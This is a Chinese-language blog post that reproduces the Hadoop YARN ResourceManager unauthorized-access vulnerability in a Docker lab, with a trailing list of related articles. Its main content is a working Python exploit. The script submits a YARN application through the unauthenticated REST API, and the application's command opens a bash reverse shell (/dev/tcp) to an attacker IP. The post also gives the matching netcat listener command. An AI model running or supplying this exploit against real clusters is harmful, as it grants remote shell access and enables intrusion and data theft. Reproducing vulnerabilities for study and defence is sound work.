Hadoop YARN ResourceManager 未授权访问漏洞复现

最新推荐文章于 2023-07-09 15:51:31 发布
最新推荐文章于 2023-07-09 15:51:31 发布
阅读量3.8k 收藏 3
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/103957615
版权

利用docker搭建环境

在这里插入图片描述
启动环境后,即可访问http://your-ip:8088
在这里插入图片描述

漏洞利用

  1. 通过REST API提交任务执行
    申请新的application:http://yourip:8088/ws/v1/cluster/apps/new-application
    在这里插入图片描述
    更多的提交方法可参考:

https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html

  1. 本地监听,反弹shell连接
    EXP
 #!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '10.18.100.22' # 攻击方的IP地址

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

先在攻击机上监听端口

nc -lvp 9999

然后运行exp脚本,反弹shell
在这里插入图片描述
最后成功获取shell
在这里插入图片描述

Franchi小白帽
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
Hadoop-yarn-授权访问漏洞复现(vulhub)
weixin_43061533的博客
12-15 6986
0x01 漏洞简述 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 HDFS是一个分布式文件系统,具有高容错性的特点,并且被设计用来部署在廉价的硬件上;而且它能够以高吞吐量来访问应用程序的数据,尤其适合那些有着超大数据集的应用程序。MapReduce是一个使用简易的软件框架,基...
hadoop漏洞_Hadoop Yarn REST API授权漏洞利用
weixin_39994627的博客
12-20 633
Hadoop Yarn REST API授权漏洞利用Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。yarn...
MSF路由转发
baidu_38844729的博客
11-29 916
前言 已经拿下一台内网服务器的控制权,想要用msf去访问内网资源,可以在msf中添加路由 msf访问内网实现的条件: 1.获得一个msf的session会话 2.在msf中添加内网网段的路由 步骤 1.msf反弹shell,获取session会话,具体过程可以参考:https://blog.csdn.net/baidu_38844729/article/details/109940441,我已经获得了会话, 2.添加路由 route add 0.0.0.0 0.0.0.0 session ID #分别为
HadoopYARN ResourceManager
热门推荐
了解➔熟悉➔掌握➔精通
03-23 3万+
分享一个大牛的人工智能教程。零基础!通俗易懂!风趣幽默!希望你也加入到人工智能的队伍中来!请点击http://www.captainbed.net 负责全局的资源管理和任务调度,把整个集群当成计算资源池,只关注分配,不管应用,且不负责容错。 资源管理 以前资源是每个节点分成一个个的Map slot和Reduce slot,现在是一个个Container,每个Container可以根据需要运行ApplicationMaster、Map、Reduce或者任意的程序 以前的资源分配是静态的,目前是动态的,
Hadoop YARN ResourceManager授权访问漏洞
Kevin's Blog
06-01 4753
文章目录一、介绍1.1 简介1.2 漏洞成因二、模拟环境三、信息收集四、攻击方法五、漏洞防御 一、介绍 1.1 简介   Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。   Apache Hadoop YARNHadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度) 1.2 漏洞成因   负责对资源进行同一管理调度的ReasourceManager组件的
记录一次vulhub:hadoop yarn ResourceManager 页面授权访问(含命令执行)漏洞复现
sszsNo1的博客
06-27 637
vulhub:hadoop yarn ResourceManager 页面授权访问(含命令执行)漏洞复现
数据库漏洞(授权访问+RCE)-Mysql+Hadoop
xiaoheizi的博客
07-09 564
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。如我们在安装使用mysq数据库时,默认情况下就会开启mysql服务和服务默认端口3306。启动漏洞环境,访问漏洞地址http://123.58.224.8:32561 即可看到Hadoop YARN ResourceManager WebUI页面。猜测可能存在Mysql 身份认证绕过漏洞,于是尝试复现漏洞漏洞利用:反弹shell。
Hadoop 授权访问【原理扫描】及Apache Hadoop YARN 资源管理器 REST API授权访问漏洞【原理扫描】修复记录
萌兔兔MMQ!!
01-10 2947
Hadoop相关授权访问漏洞风险较高且使用hadoop的用户比较多,经常在安全检查用遇到这两个漏洞。 修复方法也就是按绿盟扫描器提供的方法: 一、对于Apache Hadoop YARN 资源管理器 REST API授权访问漏洞【原理扫描】: 方法1.在防火墙上设置“安全组”访问控制策略,将 HadoopWebUI(8088) 等相关端口限制可信任的 IP 地址才能访问。 方法22.将默认认证方法改为KerBeros认证。 但我目前遇到过的管理员没有愿意将hadoop采用KerBeros认证的,看了
hadoop yarn ResourceManager 页面授权访问(含命令执行)
huayimy的博客
05-11 532
hadoop yarn ResourceManager 页面授权访问(含命令执行)
hadoop-yarn-server-resourcemanager-2.6.0-API文档-中文版.zip
04-23
赠送jar包:hadoop-yarn-server-resourcemanager-2.6.0.jar; 赠送原API文档:hadoop-yarn-server-resourcemanager-2.6.0-javadoc.jar; 赠送源代码:hadoop-yarn-server-resourcemanager-2.6.0-sources.jar; 赠送...
hadoop-yarn-server-resourcemanager-2.7.4.jar
08-06
hadoop2.7.4安装包补丁包,解决yarn定时调度启动问题!!
hadoop-yarn-api-2.5.1-API文档-中文版.zip
04-23
赠送jar包:hadoop-yarn-api-2.5.1.jar; 赠送原API文档:hadoop-yarn-api-2.5.1-javadoc.jar; 赠送源代码:hadoop-yarn-api-2.5.1-sources.jar; 赠送Maven依赖信息文件:hadoop-yarn-api-2.5.1.pom; 包含翻译后...
你的数据安全么?Hadoop再曝安全漏洞| 黑客利用Hadoop Yarn资源管理系统授权访问漏洞进行攻击...
weixin_34112208的博客
05-08 263
2019独角兽企业重金招聘Python工程师标准>>> ...
利用Vulnhub复现漏洞 - Hadoop YARN ResourceManager 授权访问
JiangBuLiu的博客
07-09 2435
Hadoop YARN ResourceManager 授权访问Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现EXP Vulnhub官方复现教程 https://vulhub.org/#/environments/hadoop/unauthorized-yarn/ 漏洞原理 http://archive.hack.lu/2016/Wavestone - Hack.lu 2016 - ...
Hadoop YARN ResourceManager 授权访问
OOOOOK的博客
07-03 1549
Hadoop YARN ResourceManager 授权访问漏洞原理及复现
复现 Hadoop YARN ResourceManager 授权访问
weixin_52766206的博客
08-09 2168
复现 Hadoop YARN ResourceManager 授权访问,更多的是用来练习和熟悉漏洞的,就没安装到太复杂的环境,直接在kali里完成的。
Hadoop YARN ResourceManager 授权访问 漏洞复现
ADummy的博客
03-10 581
Hadoop YARN ResourceManager 授权访问 by ADummy 0x00利用路线 ​ exp直接打—>其实是发了两次http包 0x01漏洞介绍 ​ 访问http://your-ip:8088即可看到Hadoop YARN ResourceManager WebUI页面 ​ 本机监听9999端口,收到shell 0x03参考资料 https://blog.csdn.net/xuandao_ahfengren/article/details/107127276 e/d
Hadoop 授权访问
最新发布
07-14
hadoop yarn resourcemanager 授权访问是指用户没有足够的权限来访问hadoop yarn resourcemanager。这可能是由于用户没有正确配置或没有正确的身份验证凭据。要解决此问题,您可以检查hadoop yarn resourcemanager...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值